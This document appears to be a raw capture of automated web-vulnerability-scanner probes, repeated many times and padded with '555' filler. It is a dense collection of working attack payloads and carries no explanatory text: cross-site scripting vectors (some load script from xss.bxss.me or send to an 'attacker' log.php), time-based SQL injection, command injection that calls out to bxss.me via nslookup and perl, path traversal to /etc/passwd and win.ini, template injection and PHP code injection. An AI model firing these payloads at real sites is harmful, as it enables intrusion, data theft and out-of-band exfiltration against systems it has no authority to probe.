555<ifRAme sRc=9739.com></IfRamE>
555
555<a9IYJ2W x=9985>
555
555
555<img sRc='http://attacker-9504/log.php?
555
555
555<a38lC7m<
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<acx><ScRiPt >TUFz(9711)</ScRiPt>
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
XNRngU2h
response.write(9598960*9953239)
'+response.write(9598960*9953239)+'
555
'"()&%<acx><ScRiPt >TUFz(9300)</ScRiPt>
"+response.write(9598960*9953239)+"
bcc:009247.6274-8235.6274.28770.20044.2@bxss.me
to@example.com>
bcc:009247.6274-8236.6274.28770.20044.2@bxss.me
5559126219
echo jvozwc$()\ pxncca\nz^xyu||a #' &echo jvozwc$()\ pxncca\nz^xyu||a #|" &echo jvozwc$()\ pxncca\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
<esi:include src="http://bxss.me/rpb.png"/>
../../../../../../../../../../../../../../windows/win.ini
555
${9999474+9999059}
&echo hvpebr$()\ itbjoi\nz^xyu||a #' &echo hvpebr$()\ itbjoi\nz^xyu||a #|" &echo hvpebr$()\ itbjoi\nz^xyu||a #
../
acu3069<s1﹥s2ʺs3ʹuca3069
|echo nsdljw$()\ vnpsku\nz^xyu||a #' |echo nsdljw$()\ vnpsku\nz^xyu||a #|" |echo nsdljw$()\ vnpsku\nz^xyu||a #
./
(nslookup hitmdrmjyobzpf73f4.bxss.me||perl -e "gethostbyname('hitmdrmjyobzpf73f4.bxss.me')")
$(nslookup hithgknsqvvroc519b.bxss.me||perl -e "gethostbyname('hithgknsqvvroc519b.bxss.me')")
&(nslookup hitjvhgwemumpef492.bxss.me||perl -e "gethostbyname('hitjvhgwemumpef492.bxss.me')")&'\"`0&(nslookup hitjvhgwemumpef492.bxss.me||perl -e "gethostbyname('hitjvhgwemumpef492.bxss.me')")&`'
555
|(nslookup hitzrtxbytlaibe107.bxss.me||perl -e "gethostbyname('hitzrtxbytlaibe107.bxss.me')")
`(nslookup hitiwwebiofen8227b.bxss.me||perl -e "gethostbyname('hitiwwebiofen8227b.bxss.me')")`
acux8723%C0%BEz1%C0%BCz2a%90bcxuca8723
;(nslookup hithkdohjxqqvc126b.bxss.me||perl -e "gethostbyname('hithkdohjxqqvc126b.bxss.me')")|(nslookup hithkdohjxqqvc126b.bxss.me||perl -e "gethostbyname('hithkdohjxqqvc126b.bxss.me')")&(nslookup hithkdohjxqqvc126b.bxss.me||perl -e "gethostbyname('hithkdohjxqqvc126b.bxss.me')")
555
<%={{={@{#{${acx}}%>
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
)
!(()&&!|*|*|
&n923863=v966547
^(#$!@#$)(()))******
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
555
<th:t="${acx}#foreach
/etc/shells
c:/windows/win.ini
bxss.me
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
'"()
'.gethostbyname(lc('hitjg'.'pdlvttls089e0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(81).chr(110).chr(75).'
acx{{98991*97996}}xca
".gethostbyname(lc("hitoi"."sabdhaota85a8.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(84).chr(107).chr(66)."
555
acx[[${98991*97996}]]xca
ctime
sleep
p0
(I30
tp1
Rp2
.
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
HttP://bxss.me/t/xss.html?%00
";print(md5(31337));$a="
${@print(md5(31337))}
acx__${98991*97996}__::.x
${@print(md5(31337))}\
'.print(md5(31337)).'
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(110).concat(85).concat(103).concat(82)+(require"socket"
Socket.gethostbyname("hitsw"+"hbaqfmov8fc81.bxss.me.")[3].to_s)+"
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'+'A'.concat(70-3).concat(22*4).concat(117).concat(68).concat(103).concat(88)+(require'socket'
Socket.gethostbyname('hitvs'+'pwixenfk82ce8.bxss.me.')[3].to_s)+'
NewsCommentAdd
555
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
-1 OR 2+931-931-1=0+0+0+1 --
NewsCommentAdd/.
-1 OR 3+931-931-1=0+0+0+1 --
-1 OR 2+764-764-1=0+0+0+1
/xfs.bxss.me
-1 OR 3+764-764-1=0+0+0+1
555
-1' OR 2+48-48-1=0+0+0+1 --
555<ScRiPt >TUFz(9042)</ScRiPt>
-1' OR 3+48-48-1=0+0+0+1 --
-1' OR 2+893-893-1=0+0+0+1 or 'R6wHyrKd'='
555<WFYPAE>OKN5C[!+!]</WFYPAE>
-1' OR 3+893-893-1=0+0+0+1 or 'R6wHyrKd'='
555
-1" OR 2+433-433-1=0+0+0+1 --
-1" OR 3+433-433-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
'"
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
<!--
555<script>TUFz(9470)</script>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
555
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
ffY88WpZ'; waitfor delay '0:0:15' --
555
'"()&%<acx><ScRiPt >lpv9(9838)</ScRiPt>
555<ScR<ScRiPt>IpT>TUFz(9848)</sCr<ScRiPt>IpT>
yZmO1vE3'); waitfor delay '0:0:15' --
'"()&%<acx><ScRiPt >lpv9(9850)</ScRiPt>
9925032
r2N02cur')); waitfor delay '0:0:15' --
1
-5 OR 243=(SELECT 243 FROM PG_SLEEP(15))--
555<ScRiPt
>TUFz(9556)</ScRiPt>
-5) OR 721=(SELECT 721 FROM PG_SLEEP(15))--
-1)) OR 972=(SELECT 972 FROM PG_SLEEP(15))--
WSD9iXVv' OR 377=(SELECT 377 FROM PG_SLEEP(15))--
acu5195<s1﹥s2ʺs3ʹuca5195
1
beK3Khqh') OR 386=(SELECT 386 FROM PG_SLEEP(15))--
555
lZABVQWs')) OR 778=(SELECT 778 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9398></ScRiPt>
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
acux9502%C0%BEz1%C0%BCz2a%90bcxuca9502
1'"
<%={{={@{#{${acx}}%>
@@AuS7C
<th:t="${acx}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
555
acx[[${98991*97996}]]xca
555
acx__${98991*97996}__::.x
555
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<isindex type=image src=1 onerror=TUFz(9073)>
<ScRiPt >lpv9(9331)</ScRiPt>
<WR1RLG>52A9D[!+!]</WR1RLG>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9340'>
<script>lpv9(9077)</script>
<ScR<ScRiPt>IpT>lpv9(9001)</sCr<ScRiPt>IpT>
555
<ScRiPt
>lpv9(9478)</ScRiPt>
555
555<body onload=TUFz(9576)>
<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9758></ScRiPt>
555
555<img src=//xss.bxss.me/t/dot.gif onload=TUFz(9538)>
<isindex type=image src=1 onerror=lpv9(9129)>
555<img src=xyz OnErRor=TUFz(9873)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9925'>
555
555<img/src=">" onerror=alert(9589)>
555
<body onload=lpv9(9679)>
<img src=//xss.bxss.me/t/dot.gif onload=lpv9(9608)>
<img src=xyz OnErRor=lpv9(9806)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%54%55%46%7A%289775%29%3C%2F%73%43%72%69%70%54%3E
<img/src=">" onerror=alert(9897)>
555
%0D%0A%3C%53%63%52%69%50%74%20%3E%6C%70%76%39%289018%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\TUFz(9528)\u003C/sCripT\u003E
\u003CScRiPt\lpv9(9863)\u003C/sCripT\u003E
555<ScRiPt>TUFz(9802)</sCripT>
555
<ScRiPt>lpv9(9889)</sCripT>
%F6<img acu onmouseover=lpv9(95411) //%F6>
%F6<img acu onmouseover=TUFz(97121) //%F6>
<input autofocus onfocus=lpv9(9164)>
555
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555
}body{acu:Expre/**/SSion(lpv9(9437))}
555<input autofocus onfocus=TUFz(9138)>
X2Tlh
<ScRiPt >lpv9(9634)</ScRiPt>
555
<WKUA65>KH6C5[!+!]</WKUA65>
<a HrEF=http://xss.bxss.me></a>
<ifRAme sRc=9082.com></IfRamE>
555
<ak60EfB x=9851>
<a HrEF=jaVaScRiPT:>
<img sRc='http://attacker-9269/log.php?
555
<anIM4Wj<
555}body{acu:Expre/**/SSion(TUFz(9180))}
555
555
555Cat7z
<ScRiPt >TUFz(9331)</ScRiPt>
555<WOOQ2M>AWQ4P[!+!]</WOOQ2M>
555
555<ifRAme sRc=9307.com></IfRamE>
555
555<ahGMVQg x=9602>
555<img sRc='http://attacker-9845/log.php?
555
555<agOS1pS<
555
555
555






response.write(9591694*9749596)
'+response.write(9591694*9749596)+'
"+response.write(9591694*9749596)+"


/../../../../../../../../../../windows/system32/BITSADMIN.exe








s8LouhoC












../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
echo ilrrco$()\ gpuaxm\nz^xyu||a #' &echo ilrrco$()\ gpuaxm\nz^xyu||a #|" &echo ilrrco$()\ gpuaxm\nz^xyu||a #


&echo hglajy$()\ riiwgr\nz^xyu||a #' &echo hglajy$()\ riiwgr\nz^xyu||a #|" &echo hglajy$()\ riiwgr\nz^xyu||a #

<esi:include src="http://bxss.me/rpb.png"/>
to@example.com>
bcc:009247.6274-11024.6274.28770.20044.2@bxss.me
../


|echo whyzix$()\ otcxsu\nz^xyu||a #' |echo whyzix$()\ otcxsu\nz^xyu||a #|" |echo whyzix$()\ otcxsu\nz^xyu||a #






(nslookup hitzjybxcphqo6b4ef.bxss.me||perl -e "gethostbyname('hitzjybxcphqo6b4ef.bxss.me')")


$(nslookup hitszlvrhzhad57e56.bxss.me||perl -e "gethostbyname('hitszlvrhzhad57e56.bxss.me')")


&(nslookup hittdqwnefklfb39b1.bxss.me||perl -e "gethostbyname('hittdqwnefklfb39b1.bxss.me')")&'\"`0&(nslookup hittdqwnefklfb39b1.bxss.me||perl -e "gethostbyname('hittdqwnefklfb39b1.bxss.me')")&`'


|(nslookup hituezbjudmcs0b241.bxss.me||perl -e "gethostbyname('hituezbjudmcs0b241.bxss.me')")




`(nslookup hitzwlxvgeqllb20a7.bxss.me||perl -e "gethostbyname('hitzwlxvgeqllb20a7.bxss.me')")`


;(nslookup hitcpvsqoszuh288b3.bxss.me||perl -e "gethostbyname('hitcpvsqoszuh288b3.bxss.me')")|(nslookup hitcpvsqoszuh288b3.bxss.me||perl -e "gethostbyname('hitcpvsqoszuh288b3.bxss.me')")&(nslookup hitcpvsqoszuh288b3.bxss.me||perl -e "gethostbyname('hitcpvsqoszuh288b3.bxss.me')")
${9999951+9999663}



























&n999820=v938326


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
)




!(()&&!|*|*|
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
^(#$!@#$)(()))******


/etc/shells


c:/windows/win.ini


bxss.me








-1 OR 2+491-491-1=0+0+0+1 --


-1 OR 2+250-250-1=0+0+0+1


-1' OR 2+581-581-1=0+0+0+1 --
-1' OR 2+274-274-1=0+0+0+1 or '6ENHMDx0'='
'"()
-1" OR 2+871-871-1=0+0+0+1 --


if(now()=sysdate(),sleep(15),0)


0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z




'.gethostbyname(lc('hityo'.'aksqbdrxc15b5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(85).chr(115).chr(72).'
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
".gethostbyname(lc("hitfm"."zpkzuxkff1f3f.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(78).chr(118).chr(79)."








1 waitfor delay '0:0:15' --






ctime
sleep
p0
(I30
tp1
Rp2
.


IAkBIB6k'; waitfor delay '0:0:15' --






pwhstBYC'); waitfor delay '0:0:15' --






C8J5GriF')); waitfor delay '0:0:15' --




HttP://bxss.me/t/xss.html?%00




tkemx3I3' OR 327=(SELECT 327 FROM PG_SLEEP(15))--


;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
bxss.me/t/xss.html?%00
';print(md5(31337));$a='




tu3hzKih') OR 549=(SELECT 549 FROM PG_SLEEP(15))--
";print(md5(31337));$a="






"+"A".concat(70-3).concat(22*4).concat(115).concat(79).concat(97).concat(81)+(require"socket"
Socket.gethostbyname("hitpx"+"lqckrmvt095fd.bxss.me.")[3].to_s)+"
m8hQVbxS')) OR 281=(SELECT 281 FROM PG_SLEEP(15))--
${@print(md5(31337))}
${@print(md5(31337))}\
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'+'A'.concat(70-3).concat(22*4).concat(98).concat(88).concat(119).concat(90)+(require'socket'
Socket.gethostbyname('hitjy'+'etvvjsgc26f05.bxss.me.')[3].to_s)+'



'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'




'.print(md5(31337)).'
NewsCommentAdd


1'"












NewsCommentAdd/.






/xfs.bxss.me
@@CSxaL






















'"


<!--













'"()&%<acx><ScRiPt >X05v(9297)</ScRiPt>














'"()&%<acx><ScRiPt >X05v(9239)</ScRiPt>











9285858
















acu9564<s1﹥s2ʺs3ʹuca9564






acux1043%C0%BEz1%C0%BCz2a%90bcxuca1043


<%={{={@{#{${acx}}%>


<th:t="${acx}#foreach




1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

<ScRiPt >X05v(9809)</ScRiPt>



<WVWXHY>NVD8P[!+!]</WVWXHY>





















<ScRiPt
>X05v(9261)</ScRiPt>







<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9879></ScRiPt>









<isindex type=image src=1 onerror=X05v(9553)>

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9137'>



<body onload=X05v(9494)>

<img src=//xss.bxss.me/t/dot.gif onload=X05v(9777)>





<img src=xyz OnErRor=X05v(9361)>

<img/src=">" onerror=alert(9068)>
%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%58%30%35%76%289721%29%3C%2F%73%43%72%69%70%54%3E

<ScRiPt>X05v(9931)</sCripT>
%F6<img acu onmouseover=X05v(96051) //%F6>

<input autofocus onfocus=X05v(9350)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>

}body{acu:Expre/**/SSion(X05v(9957))}

moXNG
<ScRiPt >X05v(9160)</ScRiPt>

<WJFXUC>NDWCK[!+!]</WJFXUC>

<ifRAme sRc=9604.com></IfRamE>

<auHC7kS x=9602>

<img sRc='http://attacker-9234/log.php?

<a9V6G7e<


















































































555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
JcSj9cHx
555
555
response.write(9938976*9838293)
555
555
'+response.write(9938976*9838293)+'
555
bcc:009247.6274-12431.6274.28770.20044.2@bxss.me
555
"+response.write(9938976*9838293)+"
to@example.com>
bcc:009247.6274-12432.6274.28770.20044.2@bxss.me
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
555
echo hjakso$()\ enqvsc\nz^xyu||a #' &echo hjakso$()\ enqvsc\nz^xyu||a #|" &echo hjakso$()\ enqvsc\nz^xyu||a #
555
555
555
&echo fkfdrl$()\ tuzrqv\nz^xyu||a #' &echo fkfdrl$()\ tuzrqv\nz^xyu||a #|" &echo fkfdrl$()\ tuzrqv\nz^xyu||a #
555
../555
555
|echo huegxu$()\ cqyeyo\nz^xyu||a #' |echo huegxu$()\ cqyeyo\nz^xyu||a #|" |echo huegxu$()\ cqyeyo\nz^xyu||a #
555
555
(nslookup hitcexmvmeznf8928e.bxss.me||perl -e "gethostbyname('hitcexmvmeznf8928e.bxss.me')")
555<esi:include src="http://bxss.me/rpb.png"/>
555
$(nslookup hitgkdjjahfmyc9267.bxss.me||perl -e "gethostbyname('hitgkdjjahfmyc9267.bxss.me')")
555
555
${9999871+10000350}
555
555
&(nslookup hitlauzfoojqt5a093.bxss.me||perl -e "gethostbyname('hitlauzfoojqt5a093.bxss.me')")&'\"`0&(nslookup hitlauzfoojqt5a093.bxss.me||perl -e "gethostbyname('hitlauzfoojqt5a093.bxss.me')")&`'
555
555
|(nslookup hitnymsvnrzwj23da5.bxss.me||perl -e "gethostbyname('hitnymsvnrzwj23da5.bxss.me')")
555
555
`(nslookup hitprejxnnsdnfe3ef.bxss.me||perl -e "gethostbyname('hitprejxnnsdnfe3ef.bxss.me')")`
;(nslookup hitgdjomucrej8b0d8.bxss.me||perl -e "gethostbyname('hitgdjomucrej8b0d8.bxss.me')")|(nslookup hitgdjomucrej8b0d8.bxss.me||perl -e "gethostbyname('hitgdjomucrej8b0d8.bxss.me')")&(nslookup hitgdjomucrej8b0d8.bxss.me||perl -e "gethostbyname('hitgdjomucrej8b0d8.bxss.me')")
555
555
555
555&n924563=v907511
555
555
555
)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555
!(()&&!|*|*|
555
555
Http://bxss.me/t/fit.txt
^(#$!@#$)(()))******
555
http://bxss.me/t/fit.txt?.jpg
555
555
/etc/shells
555
555
c:/windows/win.ini
555
bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
'.gethostbyname(lc('hitqs'.'geahmsyv8e4b8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(88).chr(119).chr(74).'
".gethostbyname(lc("hitxk"."rfofmyrd47fa1.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(84).chr(106).chr(72)."
555
HttP://bxss.me/t/xss.html?%00
555
"+"A".concat(70-3).concat(22*4).concat(102).concat(84).concat(100).concat(67)+(require"socket"
Socket.gethostbyname("hitpp"+"fiebpmuz26e0e.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
555
'+'A'.concat(70-3).concat(22*4).concat(106).concat(79).concat(120).concat(66)+(require'socket'
Socket.gethostbyname('hituh'+'jabspggrdac20.bxss.me.')[3].to_s)+'
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
';print(md5(31337));$a='
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
";print(md5(31337));$a="
NewsCommentAdd
555
555
555
${@print(md5(31337))}
/xfs.bxss.me
NewsCommentAdd/.
${@print(md5(31337))}\
555
555
'.print(md5(31337)).'
'"
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<acx><ScRiPt >zaCM(9857)</ScRiPt>
555
555
555
'"()&%<acx><ScRiPt >zaCM(9423)</ScRiPt>
555
555
5559810541
acu4834<s1﹥s2ʺs3ʹuca4834
555
acux10745%C0%BEz1%C0%BCz2a%90bcxuca10745
555
-1 OR 2+21-21-1=0+0+0+1 --
-1 OR 2+556-556-1=0+0+0+1
<%={{={@{#{${acx}}%>
-1' OR 2+857-857-1=0+0+0+1 --
-1' OR 2+227-227-1=0+0+0+1 or 'YrEAjjgk'='
-1" OR 2+620-620-1=0+0+0+1 --
<th:t="${acx}#foreach
if(now()=sysdate(),sleep(15),0)
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
acx{{98991*97996}}xca
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
acx[[${98991*97996}]]xca
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
acx__${98991*97996}__::.x
-1; waitfor delay '0:0:15' --
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
555<ScRiPt >zaCM(9430)</ScRiPt>
n2q1yNYk'; waitfor delay '0:0:15' --
555<W9N0OP>NHBPG[!+!]</W9N0OP>
75oQPqHq'); waitfor delay '0:0:15' --
555<script>zaCM(9979)</script>
QsrOR1Bl')); waitfor delay '0:0:15' --
555<ScR<ScRiPt>IpT>zaCM(9039)</sCr<ScRiPt>IpT>
-5 OR 959=(SELECT 959 FROM PG_SLEEP(15))--
555<ScRiPt
>zaCM(9312)</ScRiPt>
-5) OR 638=(SELECT 638 FROM PG_SLEEP(15))--
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9951></ScRiPt>
-1)) OR 659=(SELECT 659 FROM PG_SLEEP(15))--
154gwvMs' OR 89=(SELECT 89 FROM PG_SLEEP(15))--
555<isindex type=image src=1 onerror=zaCM(9931)>
OM81oRrt') OR 710=(SELECT 710 FROM PG_SLEEP(15))--
9A8KryuQ')) OR 272=(SELECT 272 FROM PG_SLEEP(15))--
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9041'>
555<body onload=zaCM(9947)>
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555<img src=//xss.bxss.me/t/dot.gif onload=zaCM(9210)>
1'"
@@stHPP
555<img src=xyz OnErRor=zaCM(9258)>
555
555<img/src=">" onerror=alert(9553)>
555
555
555
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%61%43%4D%289414%29%3C%2F%73%43%72%69%70%54%3E
555
555
555\u003CScRiPt\zaCM(9608)\u003C/sCripT\u003E
555
555<ScRiPt>zaCM(9019)</sCripT>
555
%F6<img acu onmouseover=zaCM(95891) //%F6>
555
555<input autofocus onfocus=zaCM(9650)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{acu:Expre/**/SSion(zaCM(9343))}
555
555iRHg6
<ScRiPt >zaCM(9615)</ScRiPt>
555
555<WX3QHF>0NULO[!+!]</WX3QHF>
555
555<ifRAme sRc=9226.com></IfRamE>
555
555<aDH8q5l x=9159>
555
555
555
555<img sRc='http://attacker-9397/log.php?
555
555
555
555
555
555
555
555<aHhozQc<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555


555
555
555
1
555'"()&%<acx><ScRiPt >s0bE(9192)</ScRiPt>
555'"()&%<acx><ScRiPt >8ieq(9976)</ScRiPt>
'"()&%<acx><ScRiPt >s0bE(9948)</ScRiPt>
'"()&%<acx><ScRiPt >8ieq(9970)</ScRiPt>
5559827136
5559149182
acu5957<s1﹥s2ʺs3ʹuca5957
acu10465<s1﹥s2ʺs3ʹuca10465
acux6569%C0%BEz1%C0%BCz2a%90bcxuca6569
<%={{={@{#{${acx}}%>
acux8527%C0%BEz1%C0%BCz2a%90bcxuca8527
<th:t="${acx}#foreach
<%={{={@{#{${acx}}%>
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
acx{{98991*97996}}xca
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
acx[[${98991*97996}]]xca
555
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
555
acx__${98991*97996}__::.x
acx__${98991*97996}__::.x
555
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >8ieq(9839)</ScRiPt>
555
555
555<W5X8CN>WNFCZ[!+!]</W5X8CN>
555
555
555<script>8ieq(9508)</script>
555<ScRiPt >s0bE(9953)</ScRiPt>
555<WPKHDY>NUA0I[!+!]</WPKHDY>
555<ScR<ScRiPt>IpT>8ieq(9286)</sCr<ScRiPt>IpT>
555<script>s0bE(9195)</script>
555<ScR<ScRiPt>IpT>s0bE(9083)</sCr<ScRiPt>IpT>
555<ScRiPt
>8ieq(9452)</ScRiPt>
555
555<ScRiPt
>s0bE(9058)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9883></ScRiPt>
555
555
555
555
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9732></ScRiPt>
555
555
555
555<isindex type=image src=1 onerror=8ieq(9108)>
555<isindex type=image src=1 onerror=s0bE(9441)>
555
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9984'>
555
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9190'>
555
555
555<body onload=8ieq(9426)>
555
555
555<body onload=s0bE(9424)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=s0bE(9478)>
555
555<img src=xyz OnErRor=s0bE(9318)>
555<img src=//xss.bxss.me/t/dot.gif onload=8ieq(9643)>
555<img/src=">" onerror=alert(9773)>
555
555<img src=xyz OnErRor=8ieq(9040)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%73%30%62%45%289121%29%3C%2F%73%43%72%69%70%54%3E
555
555<img/src=">" onerror=alert(9182)>
555\u003CScRiPt\s0bE(9277)\u003C/sCripT\u003E
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%38%69%65%71%289799%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\8ieq(9126)\u003C/sCripT\u003E
555
555<ScRiPt>8ieq(9517)</sCripT>
555<ScRiPt>s0bE(9579)</sCripT>
555
555
%F6<img acu onmouseover=8ieq(90401) //%F6>
555
555
555<input autofocus onfocus=8ieq(9785)>
<a HrEF=http://xss.bxss.me></a>
555
555
555
%F6<img acu onmouseover=s0bE(90311) //%F6>
<a HrEF=jaVaScRiPT:>
555
555<input autofocus onfocus=s0bE(9474)>
555}body{acu:Expre/**/SSion(8ieq(9614))}
555
<a HrEF=http://xss.bxss.me></a>
555gsQmk
<ScRiPt >8ieq(9000)</ScRiPt>
555<WW2TDF>ZFKLH[!+!]</WW2TDF>
555
555<ifRAme sRc=9779.com></IfRamE>
555
555
<a HrEF=jaVaScRiPT:>
555<aOk2xcU x=9242>
555
555}body{acu:Expre/**/SSion(s0bE(9400))}
555
555<img sRc='http://attacker-9681/log.php?
555
555uk6kN
<ScRiPt >s0bE(9703)</ScRiPt>
555<a5fPBmr<
555
555<WX0CAH>XGPLF[!+!]</WX0CAH>
555
555<ifRAme sRc=9406.com></IfRamE>
555
555
555<aLP2SEw x=9030>
555
555
555
555<img sRc='http://attacker-9706/log.php?
555
555<a3KXCV5<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555